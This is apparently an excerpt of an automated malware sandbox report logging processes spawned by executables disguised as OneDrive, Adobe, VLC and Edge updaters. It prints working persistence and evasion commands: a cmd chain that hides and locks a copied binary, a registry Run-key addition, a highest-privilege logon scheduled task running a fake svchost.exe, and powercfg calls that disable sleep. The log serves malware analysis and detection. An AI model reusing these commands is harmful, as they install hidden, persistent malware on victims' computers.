                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c start cmd /q /c " ping localhost -n 1 && copy "c:\users\user\appdata\roaming\adobelicense\adobeupdate.exe" "c:\users\user\appdata\local\msedge.exe" && attrib +r +h +a "c:\users\user\appdata\local\msedge.exe" && icacls "c:\users\user\appdata\local\msedge.exe" /deny "everyone":(wd,ad,wea,wa) && del "c:\users\user\appdata\roaming\adobelicense\adobeupdate.exe" && cmd /c "start "c:\users\user\appdata\local\msedge.exe" && exit" && && exit "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /q /c " ping localhost -n 1 && copy "c:\users\user\appdata\roaming\adobelicense\adobeupdate.exe" "c:\users\user\appdata\local\msedge.exe" && attrib +r +h +a "c:\users\user\appdata\local\msedge.exe" && icacls "c:\users\user\appdata\local\msedge.exe" /deny "everyone":(wd,ad,wea,wa) && del "c:\users\user\appdata\roaming\adobelicense\adobeupdate.exe" && cmd /c "start "c:\users\user\appdata\local\msedge.exe"
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" remove -itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'onedriveupdate';new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'onedriveupdate' -value '"c:\users\user\appdata\roaming\onedriveupdate\onedrive updater.exe"' -propertytype 'string'
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#npnsokoe#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'consolewindowshost' /tr '''c:\users\user\appdata\roaming\google\chrome\svchost.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\svchost.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'consolewindowshost' -runlevel 'highest' -force; }
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#npnsokoe#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'consolewindowshost' /tr '''c:\users\user\appdata\roaming\google\chrome\svchost.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\svchost.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'consolewindowshost' -runlevel 'highest' -force; }
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lygkxs#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'consolewindowshost' /tr '''c:\users\user\appdata\roaming\google\chrome\svchost.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\svchost.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'consolewindowshost' -runlevel 'highest' -force; }
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c start cmd /q /c " ping localhost -n 1 && copy "c:\users\user\appdata\roaming\adobelicense\adobeupdate.exe" "c:\users\user\appdata\local\msedge.exe" && attrib +r +h +a "c:\users\user\appdata\local\msedge.exe" && icacls "c:\users\user\appdata\local\msedge.exe" /deny "everyone":(wd,ad,wea,wa) && del "c:\users\user\appdata\roaming\adobelicense\adobeupdate.exe" && cmd /c "start "c:\users\user\appdata\local\msedge.exe" && exit" && && exit "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /q /c " ping localhost -n 1 && copy "c:\users\user\appdata\roaming\adobelicense\adobeupdate.exe" "c:\users\user\appdata\local\msedge.exe" && attrib +r +h +a "c:\users\user\appdata\local\msedge.exe" && icacls "c:\users\user\appdata\local\msedge.exe" /deny "everyone":(wd,ad,wea,wa) && del "c:\users\user\appdata\roaming\adobelicense\adobeupdate.exe" && cmd /c "start "c:\users\user\appdata\local\msedge.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" remove -itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'onedriveupdate';new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'onedriveupdate' -value '"c:\users\user\appdata\roaming\onedriveupdate\onedrive updater.exe"' -propertytype 'string'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#npnsokoe#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'consolewindowshost' /tr '''c:\users\user\appdata\roaming\google\chrome\svchost.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\svchost.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'consolewindowshost' -runlevel 'highest' -force; }
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lygkxs#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'consolewindowshost' /tr '''c:\users\user\appdata\roaming\google\chrome\svchost.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\svchost.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'consolewindowshost' -runlevel 'highest' -force; }
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeCode function: GetLocaleInfoEx,FormatMessageA,1_2_00007FF6C12AC8D4
                      Source: C:\Users\user\AppData\Local\Msedge.exeCode function: GetLocaleInfoEx,FormatMessageA,18_2_00007FF62B64C8D4
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeQueries volume information: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
